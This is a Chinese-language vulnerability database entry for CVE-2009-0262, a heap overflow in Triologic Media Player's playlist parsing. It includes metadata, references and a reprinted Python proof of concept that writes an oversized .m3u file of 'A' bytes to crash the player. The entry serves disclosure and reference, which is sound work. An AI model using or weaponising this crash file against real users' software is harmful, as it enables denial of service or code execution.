Triologic Media Player播放列表文件解析堆溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117225 漏洞类型 缓冲区溢出
发布时间 2009-01-12 更新时间 2009-02-05
CVE编号 CVE-2009-0262 CNNVD-ID CNNVD-200901-324
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7737
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-324
|漏洞详情
TriologicMediaPlayer是支持多种媒体格式的免费媒体播放器。如果用户受骗使用TriologicMediaPlayer加载了畸形的*.m3u或*.m3l播放列表文件的话,就可以触发堆溢出,导致执行任意代码。
|漏洞EXP
# IN THE NAME OF ALLAH :)
#!/usr/bin/python
# Discovered By : zAx
# Download Application : http://www.download.com/Triologic-Media-Player/3000-2139_4-10601848.html?tag=mncol

print "**************************************************************************"
print " Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC\n"
print " Discovered By : zAx\n"
print " ThE-zAx@HoTMaiL.CoM\n"
print " In that PoC thanks for : Stack ;) My BrOthEr :)"
print "**************************************************************************"

overflow = "\x41" * 3000 # not right, just a PoC

try:
    out_file = open("zAx.m3u",'w')
    out_file.write(overflow)
    out_file.close()
    raw_input("\nPoC file created!, Now go to the program and click at Load Button\n")
except:
    print "Error"
# EoF

# milw0rm.com [2009-01-12]
|参考资料

来源:BID
名称:33221
链接:http://www.securityfocus.com/bid/33221
来源:VUPEN
名称:ADV-2009-0097
链接:http://www.frsirt.com/english/advisories/2009/0097
来源:SECUNIA
名称:33496
链接:http://secunia.com/advisories/33496
来源:MILW0RM
名称:7737
链接:http://milw0rm.com/exploits/7737